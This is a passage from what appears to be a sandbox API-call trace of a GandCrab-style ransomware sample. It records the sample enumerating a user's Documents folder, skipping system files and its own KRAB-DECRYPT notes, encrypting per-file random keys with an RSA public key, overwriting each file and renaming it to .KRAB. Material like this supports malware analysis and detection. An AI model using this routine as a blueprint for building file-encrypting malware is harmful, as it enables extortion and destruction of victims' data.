param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 121 [0089.892] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\d2ca4a08d2ca4dee3d.lock") returned 116 [0089.892] lstrlenW (lpString=".lock") returned 5 [0089.892] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.892] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0089.892] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.893] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.894] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0089.894] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0089.894] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0089.894] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\KRAB-DECRYPT.txt" [0089.894] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.894] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\KRAB-DECRYPT.txt.KRAB") returned 114 [0089.894] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\KRAB-DECRYPT.txt") returned 109 [0089.894] lstrlenW (lpString=".txt") returned 4 [0089.894] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.895] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0089.895] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.895] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\KRAB-DECRYPT.txt") returned 109 [0089.895] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\KRAB-DECRYPT.txt") returned 109 [0089.895] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0089.895] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0089.895] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0089.895] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0089.895] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0089.895] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0089.895] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0089.895] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0089.895] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0089.895] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0089.895] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.896] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0089.896] lstrcmpW (lpString1="PLOi1WRQlD.csv", lpString2=".") returned 1 [0089.896] lstrcmpW (lpString1="PLOi1WRQlD.csv", lpString2="..") returned 1 [0089.896] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\", lpString2="PLOi1WRQlD.csv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\PLOi1WRQlD.csv") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\PLOi1WRQlD.csv" [0089.896] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.896] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\PLOi1WRQlD.csv.KRAB") returned 112 [0089.896] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\PLOi1WRQlD.csv") returned 107 [0089.896] lstrlenW (lpString=".csv") returned 4 [0089.896] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.897] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".csv ") returned 5 [0089.897] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.897] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\PLOi1WRQlD.csv") returned 107 [0089.897] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\PLOi1WRQlD.csv") returned 107 [0089.897] lstrcmpiW (lpString1="PLOi1WRQlD.csv", lpString2="desktop.ini") returned 1 [0089.897] lstrcmpiW (lpString1="PLOi1WRQlD.csv", lpString2="autorun.inf") returned 1 [0089.897] lstrcmpiW (lpString1="PLOi1WRQlD.csv", lpString2="ntuser.dat") returned 1 [0089.897] lstrcmpiW (lpString1="PLOi1WRQlD.csv", lpString2="iconcache.db") returned 1 [0089.897] lstrcmpiW (lpString1="PLOi1WRQlD.csv", lpString2="bootsect.bak") returned 1 [0089.897] lstrcmpiW (lpString1="PLOi1WRQlD.csv", lpString2="boot.ini") returned 1 [0089.898] lstrcmpiW (lpString1="PLOi1WRQlD.csv", lpString2="ntuser.dat.log") returned 1 [0089.898] lstrcmpiW (lpString1="PLOi1WRQlD.csv", lpString2="thumbs.db") returned -1 [0089.898] lstrcmpiW (lpString1="PLOi1WRQlD.csv", lpString2="KRAB-DECRYPT.html") returned 1 [0089.898] lstrcmpiW (lpString1="PLOi1WRQlD.csv", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.898] lstrcmpiW (lpString1="PLOi1WRQlD.csv", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.898] lstrcmpiW (lpString1="PLOi1WRQlD.csv", lpString2="ntldr") returned 1 [0089.898] lstrcmpiW (lpString1="PLOi1WRQlD.csv", lpString2="NTDETECT.COM") returned 1 [0089.898] lstrcmpiW (lpString1="PLOi1WRQlD.csv", lpString2="Bootfont.bin") returned 1 [0089.898] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.898] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010bd8) returned 1 [0089.900] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.900] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.900] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.900] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0089.900] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0089.900] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.901] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x10111b0) returned 1 [0089.902] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.904] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.905] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.905] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0089.905] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0089.905] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.905] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011678) returned 1 [0089.906] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10231f8) returned 1 [0089.907] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0089.907] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0089.907] GetLastError () returned 0x0 [0089.907] CryptDestroyKey (hKey=0x10231f8) returned 1 [0089.907] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0089.907] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011898) returned 1 [0089.909] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10235f8) returned 1 [0089.909] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0089.909] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0089.909] GetLastError () returned 0x0 [0089.909] CryptDestroyKey (hKey=0x10235f8) returned 1 [0089.909] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0089.909] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\PLOi1WRQlD.csv" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\ploi1wrqld.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0089.910] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0089.910] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0089.910] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0xfad1, lpOverlapped=0x0) returned 1 [0089.949] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xffff052f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.949] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xfad1, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0xfad1, lpOverlapped=0x0) returned 1 [0089.950] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0089.950] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.955] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.956] CloseHandle (hObject=0x7ec) returned 1 [0089.956] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.956] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\PLOi1WRQlD.csv" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\ploi1wrqld.csv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\PLOi1WRQlD.csv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\ploi1wrqld.csv.krab")) returned 1 [0089.957] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.957] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0089.957] lstrcmpW (lpString1="S8kyP0OzLqZ.pdf", lpString2=".") returned 1 [0089.957] lstrcmpW (lpString1="S8kyP0OzLqZ.pdf", lpString2="..") returned 1 [0089.957] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\", lpString2="S8kyP0OzLqZ.pdf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\S8kyP0OzLqZ.pdf") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\S8kyP0OzLqZ.pdf" [0089.957] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.958] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\S8kyP0OzLqZ.pdf.KRAB") returned 113 [0089.958] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\S8kyP0OzLqZ.pdf") returned 108 [0089.958] lstrlenW (lpString=".pdf") returned 4 [0089.958] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.958] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".pdf ") returned 5 [0089.958] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.959] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\S8kyP0OzLqZ.pdf") returned 108 [0089.959] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\S8kyP0OzLqZ.pdf") returned 108 [0089.959] lstrcmpiW (lpString1="S8kyP0OzLqZ.pdf", lpString2="desktop.ini") returned 1 [0089.959] lstrcmpiW (lpString1="S8kyP0OzLqZ.pdf", lpString2="autorun.inf") returned 1 [0089.959] lstrcmpiW (lpString1="S8kyP0OzLqZ.pdf", lpString2="ntuser.dat") returned 1 [0089.959] lstrcmpiW (lpString1="S8kyP0OzLqZ.pdf", lpString2="iconcache.db") returned 1 [0089.959] lstrcmpiW (lpString1="S8kyP0OzLqZ.pdf", lpString2="bootsect.bak") returned 1 [0089.959] lstrcmpiW (lpString1="S8kyP0OzLqZ.pdf", lpString2="boot.ini") returned 1 [0089.959] lstrcmpiW (lpString1="S8kyP0OzLqZ.pdf", lpString2="ntuser.dat.log") returned 1 [0089.959] lstrcmpiW (lpString1="S8kyP0OzLqZ.pdf", lpString2="thumbs.db") returned -1 [0089.959] lstrcmpiW (lpString1="S8kyP0OzLqZ.pdf", lpString2="KRAB-DECRYPT.html") returned 1 [0089.959] lstrcmpiW (lpString1="S8kyP0OzLqZ.pdf", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.959] lstrcmpiW (lpString1="S8kyP0OzLqZ.pdf", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.959] lstrcmpiW (lpString1="S8kyP0OzLqZ.pdf", lpString2="ntldr") returned 1 [0089.959] lstrcmpiW (lpString1="S8kyP0OzLqZ.pdf", lpString2="NTDETECT.COM") returned 1 [0089.959] lstrcmpiW (lpString1="S8kyP0OzLqZ.pdf", lpString2="Bootfont.bin") returned 1 [0089.959] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.960] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x10111b0) returned 1 [0089.961] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0089.962] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.962] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.962] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0089.962] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0089.962] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.962] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011898) returned 1 [0089.964] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0089.964] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.965] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.965] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0089.965] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0089.965] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.965] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x10111b0) returned 1 [0089.967] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023338) returned 1 [0089.967] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0089.967] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0089.967] GetLastError () returned 0x0 [0089.967] CryptDestroyKey (hKey=0x1023338) returned 1 [0089.967] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0089.967] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011678) returned 1 [0089.969] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10231f8) returned 1 [0089.969] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0089.969] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0089.969] GetLastError () returned 0x0 [0089.969] CryptDestroyKey (hKey=0x10231f8) returned 1 [0089.969] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0089.969] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\S8kyP0OzLqZ.pdf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\s8kyp0ozlqz.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0089.970] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0089.970] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0089.971] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x108af, lpOverlapped=0x0) returned 1 [0089.987] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffef751, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.988] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x108af, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x108af, lpOverlapped=0x0) returned 1 [0089.988] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0089.988] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.997] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.000] CloseHandle (hObject=0x7ec) returned 1 [0090.000] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.000] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\S8kyP0OzLqZ.pdf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\s8kyp0ozlqz.pdf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\S8kyP0OzLqZ.pdf.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\s8kyp0ozlqz.pdf.krab")) returned 1 [0090.001] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.001] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0090.001] lstrcmpW (lpString1="uHWX.ods", lpString2=".") returned 1 [0090.001] lstrcmpW (lpString1="uHWX.ods", lpString2="..") returned 1 [0090.001] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\", lpString2="uHWX.ods" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\uHWX.ods") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\uHWX.ods" [0090.001] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.002] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\uHWX.ods.KRAB") returned 106 [0090.002] lstrlenW 